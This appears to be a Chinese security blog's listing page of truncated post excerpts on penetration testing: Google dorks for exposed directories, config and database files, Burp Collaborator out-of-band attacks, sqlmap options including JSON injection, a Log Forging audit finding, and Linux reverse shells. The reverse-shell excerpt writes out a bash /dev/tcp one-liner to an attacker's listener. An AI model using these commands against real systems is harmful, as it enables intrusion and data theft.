话不多少,看内容~ 1目录遍历漏洞 语法为: site:www.je2se.com intitle:index.of 2 配置文件泄露 语法为: site:www.je2se.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini 3数据库文件泄露 site:www.je2se.com ext:sql | ext:dbf | e…
话不多少,看内容~ 1目录遍历漏洞 语法为: site:www.je2se.com intitle:index.of 2 配置文件泄露 语法为: site:www.je2se.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini 3数据库文件泄露 site:www.je2se.com ext:sql | ext:dbf | e…
最近碰到一种攻击方式,上网查了下。技术出现很久了,但是没怎么见过,最近突然接触到,感觉挺有意思,就整理了下这个漏洞也找了下网上的资料,整合了这个文章。 首先说下我们用到的Burp Collaborator,这个工具burp中,网上说1.6以后版本自带,我是没找到,我现在用的1.7.37,里面没有,但是插件库里面存在,我在插件库里面下载的,具体的工具触发地方在这 首先我们先说一下web中的带内带外攻击,首先介绍两个概念,带内与带外的区别核心在于是否使用不同的通信通道。 在一次攻击当中,只有一条通道,属于in-band…
从业好久了,有的时候碰到注入直接 -u 什么参数都不加,导致效率十分的低,是时候增加一些效率了,整理了下sqlmap的实用命令,以及解析~ SqlMap -u url //指定某一链接进行注入检测,不解释 -r 1.txt //对于post注入机器好用,把post数据保存成文本,-r引用该文本检测 --cookie "cookie_value" //检测cookie中存在注入的参数,cookie_value为cookie值 -u url -date "id=3" //检测…
我们进行渗透测试,有的时候会遇到json传递数据包的项目,如果我们的某一个json参数存在注入,手注还可以,但是着实让sqlmap犯了难~ 通常的json数据通常是这个样,{"id":["int"]} sqlmap无法判断参数是哪个,sqlmap的 -p 命令又不好制定json的字段信息,sqlmap会懵逼~ 我们知道在sqlmap中在需要检测参数中插入一个“ * ”号,是制定待检测的参数。所以检测json注入的方法如下 方法1: {"id":["int*"]} 网上的方法2: {"id":"int"} …
在网上整理了几种常见的linux下的反弹shell 的这几种方法,整理出后跟大家分享一下,我的被攻击机为Centos7,监听机为Kali2.0 第一种 首先,使用nc在kali上监听端口 nc -lvp port 在被攻击机器建立连接,ip为kali的ip,port为kali设置的port bash -i >& /dev/tcp/ip/port 0>&1 第二种 首先,使用nc在kali上监听端口 nc -lvp port 第二种是利用python反弹shell,ip为kali的ip,p…
Log Forging漏洞: 1.数据从一个不可信赖的数据源进入应用程序。 在这种情况下,数据经由CreditCompanyController.java 的第 53行进入 getParameter()。 2. 数据写入到应用程序或系统日志文件中。 这种情况下,数据通过CreditCompanyController.java 文件第86 行的 info() 记录下来。为了便于以后的审阅、统计数据收集或调试,应用程序通常使用日志…